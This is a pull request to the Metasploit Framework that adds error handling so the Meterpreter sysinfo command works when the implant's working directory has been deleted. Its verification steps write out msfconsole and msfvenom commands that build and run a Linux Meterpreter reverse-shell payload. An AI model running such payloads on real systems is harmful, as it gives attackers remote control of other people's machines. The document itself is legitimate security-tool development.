### PR TITLE
Fix sysinfo fails when cwd in the implant is deleted

### DIFF
--- a/lib/msf/base/sessions/meterpreter.rb
+++ b/lib/msf/base/sessions/meterpreter.rb
@@ -425,7 +425,11 @@ class Meterpreter < Rex::Post::Meterpreter::Client
 
   def update_session_info
     # sys.config.getuid, and fs.dir.getwd cache their results, so update them
-    fs&.dir&.getwd
+    begin
+      fs&.dir&.getwd
+    rescue Rex::Post::Meterpreter::RequestError => e
+      elog('failed retrieving working directory', error: e)
+    end
     username = self.sys.config.getuid
     sysinfo  = self.sys.config.sysinfo
 

--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
@@ -1225,7 +1225,7 @@ class Console::CommandDispatcher::Stdapi::Sys
   def cmd_sysinfo(*args)
     info = client.sys.config.sysinfo(refresh: true)
     client.update_session_info
-    
+
     width = "Meterpreter".length
     info.keys.each { |k| width = k.length if k.length > width and info[k] }
 

--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
@@ -1224,10 +1224,8 @@ class Console::CommandDispatcher::Stdapi::Sys
   #
   def cmd_sysinfo(*args)
     info = client.sys.config.sysinfo(refresh: true)
-    begin
-      client.update_session_info
-    rescue
-    end
+    client.update_session_info
+    
     width = "Meterpreter".length
     info.keys.each { |k| width = k.length if k.length > width and info[k] }
 

--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
@@ -1224,8 +1224,10 @@ class Console::CommandDispatcher::Stdapi::Sys
   #
   def cmd_sysinfo(*args)
     info = client.sys.config.sysinfo(refresh: true)
-    client.update_session_info
-
+    begin
+      client.update_session_info
+    rescue
+    end
     width = "Meterpreter".length
     info.keys.each { |k| width = k.length if k.length > width and info[k] }
 


### PR DESCRIPTION
This fix [257](https://github.com/rapid7/mettle/issues/257)

## Before
```bash
[*] Starting interaction with 1...

meterpreter > ls
[-] stdapi_fs_getwd: Operation failed: 2
meterpreter > sysinfo
[-] stdapi_fs_getwd: Operation failed: 2
meterpreter > 
```

## After
```bash
[*] Starting interaction with 1...

meterpreter > ls
[-] stdapi_fs_getwd: Operation failed: 2
meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Ubuntu 22.04 (Linux 6.8.11-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```


## Verification

- [ ] Start `msfconsole -qx "use linux/x64/meterpreter_reverse_tcp; set lhost 0.0.0.0; set lport 4445; to_handler"`
- [ ] Generate a Linux meterpreter `msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<LHOST> LPORT=4445 -f elf -o meterpreter.elf`
- [ ] Execute the payload **FROM** a directory **YOU CAN DELETE**; For example `/tmp/one/two/meterpreter.elf`
- [ ] `cd /tmp/one/two/ && ./meterpreter.elf` as we want the CWD to be set to `/tmp/one/two`
- [ ] When the meterpreter is running, execute from another shell `rm -rf /tmp/one`; This will trigger the cwd to be invalid inside the running process
- [ ] Run inside the meterpreter session `ls` and `sysinfo`
- [ ] `sysinfo` now is working even if the cwd is set to an invalid directory
